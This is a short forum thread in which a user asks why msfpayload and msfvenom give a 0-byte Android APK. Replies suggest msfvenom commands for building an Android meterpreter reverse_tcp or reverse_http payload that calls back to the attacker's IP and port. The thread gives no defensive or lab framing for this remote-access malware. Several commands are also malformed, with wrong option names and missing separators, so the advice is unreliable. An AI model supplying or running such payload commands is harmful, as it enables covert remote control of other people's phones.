Forum Thread: [UNSOLVED] Msfvenom Android Payload Problem

Hi guys first thx to all who help me alot i have a simple problem with my msfvenom when i create my payload
msfpayload android/meterpreter/reverse_tcp LHOST=my ip LPORTmy port R > /root/name.apk
the seize of payload after create is 0 buyte
can any one eplain to me why and how to fix this problem btw i use backbox os

4 Responses

Intead of msfpayload you should use:
msfvenom -p android/meterpreter/reversetcp LHOST=yourip LPORT= your_port R > /root/name.apk
And it doesnt matter what os you are using. Msf is same everywhere :) good luck

i use this but same the seize is 0 byte of the payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=my ip LPORTmy port R > /root/name.apk

you have to update your metasploit to last version then run thin
msfvenom -p android/meterpreter/reverse_http HOST=my ip LPORTmy port 0 /root/name.apk

Share Your Thoughts

  • Hot
  • Active